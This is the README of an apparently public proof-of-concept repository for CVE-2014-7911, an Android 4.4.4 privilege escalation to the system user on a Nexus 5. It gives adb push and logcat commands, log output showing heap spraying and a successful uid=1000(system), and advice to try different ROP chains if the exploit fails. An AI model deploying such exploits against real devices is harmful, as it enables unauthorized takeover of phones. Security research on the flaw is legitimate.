ele7enxxh/CVE-2014-7911

CVE-2014-7911

PoC for CVE-2014-7911 on the Nexus 5 running Android 4.4.4_r1, based on retme7's PoC but using a different ROP chain.

Info: http://ele7enxxh.com/CVE-2014-7911-Detailed-Analysis-Of-Android-Local-Privilege-Escalation-To-System-Vulnerability.html

Usage

Connect your phone via adb:

adb push jni/expolit /data/local/tmp
adb logcat | grep auo_

Launch this PoC and click the “CVE-2014-7911” button; you will see:

D/auo_CVE20147911(24892): staticAddr = 0x43a1f000
D/auo_CVE20147911(24892): heap sparying... 0
D/auo_CVE20147911(24892): heap sparying... 100
D/auo_CVE20147911(24892): heap sparying... 200
D/auo_CVE20147911(24892): heap sparying... 300
D/auo_CVE20147911(24892): heap sparying... 400
D/auo_CVE20147911(24892): heap sparying... 500
D/auo_CVE20147911(24892): heap sparying... 600
D/auo_CVE20147911(24892): heap sparying... 700
D/auo_CVE20147911(24892): heap sparying... 800
D/auo_CVE20147911(24892): heap sparying... 900
D/auo_CVE20147911(24892): heap sparying... 1000
D/auo_CVE20147911(24892): heap sparying... 1100
D/auo_CVE20147911(24892): heap sparying... 1200
D/auo_CVE20147911(24892): heap sparying... 1300
D/auo_CVE20147911(24892): heap sparying... 1400
D/auo_CVE20147911(24892): heap sparying... 1500
D/auo_CVE20147911(24892): heap sparying... 1600
D/auo_CVE20147911(24892): heap sparying... 1700
D/auo_CVE20147911(24892): heap sparying... 1800
D/auo_CVE20147911(24892): heap sparying... 1900

Then minimize the activity several times until the system crashes. If you see:

D/auo_exploit(22665): uid=1000(system) gid=1000(system)

the exploit has succeeded. If your phone just crashes, your device is vulnerable but the exploit may have failed (you should find different ROP chains).
